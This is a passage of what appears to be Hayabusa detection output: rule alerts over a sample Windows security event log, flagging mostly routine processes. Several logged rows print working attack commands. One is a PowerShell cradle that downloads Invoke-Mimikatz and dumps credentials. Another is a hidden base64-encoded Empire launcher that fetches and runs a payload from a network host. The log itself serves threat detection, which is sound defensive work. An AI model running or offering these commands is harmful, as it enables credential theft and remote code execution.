C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:04:55.947 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:23:21.642 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:23:21.658 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:23:21.658 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:25:21.642 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:25:21.642 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:25:21.830 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:25:22.861 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:25:22.861 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 15:38:00.158 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:43:45.656 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:43:48.234 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:44:06.459 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:46:45.553 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:46:45.647 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:45.022 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.850 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Users\IEUser\Desktop\launcher.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JAB3AEMAPQBOAGUAVwAtAE8AQgBKAGUAYwBUACAAUwB5AHMAVABlAG0ALgBOAEUAdAAuAFcARQBiAEMATABpAEUAbgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABFAEEARABlAHIAUwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBDAC4AUAByAG8AWABZACAAPQAgAFsAUwB5AFMAVABlAE0ALgBOAGUAVAAuAFcARQBCAFIARQBxAHUAZQBTAFQAXQA6ADoARABlAEYAYQB1AGwAdABXAGUAQgBQAFIAbwBYAHkAOwAkAHcAQwAuAFAAUgBvAHgAWQAuAEMAUgBlAEQARQBOAHQASQBBAEwAUwAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBFAFQALgBDAHIAZQBEAEUAbgBUAGkAQQBsAEMAYQBjAEgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4ARQB0AHcATwByAGsAQwBSAEUARABFAE4AdABpAGEATABzADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMAaABhAFIAWwBdAF0AJABiAD0AKABbAGMASABBAFIAWwBdAF0AKAAkAFcAYwAuAEQATwB3AG4ATABPAEEAZABTAFQAcgBJAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABvAFIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAGcAVABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8ASQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 0x4d011,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,high,Exec,Suspicious Encoded PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_enc_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,critical,Exec,Empire PowerShell Launch Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_empire_launch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 20:58:46.881 +00:00,IE10Win7,4688,medium,,Base64 Encoded Command Line Param Indicator,,rules/sigma/process_creation_builtin/proc_creation_win_susp_base64_cmdline_param.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 21:06:23.556 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 21:11:59.064 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\gpedit.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 22:00:00.562 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 22:17:58.251 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 22:17:58.259 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:49.989 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:50.038 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:50.394 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:50.577 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:51.064 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:34:51.099 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:36:35.595 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:38:39.078 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:38:44.366 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:38:58.135 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:54:34.003 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:54:34.019 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:54:34.030 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xbd4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:56:33.997 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:56:33.997 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:56:34.007 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 21:02:39.198 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 22:10:00.204 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 00:43:11.512 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 00:49:33.186 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 00:49:33.198 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:56.595 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:56.600 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:56.600 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:56.608 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:57.729 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:57.955 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:21:00.750 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:21:00.752 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:21:00.760 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:21:00.892 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:21:01.001 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:22:11.163 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 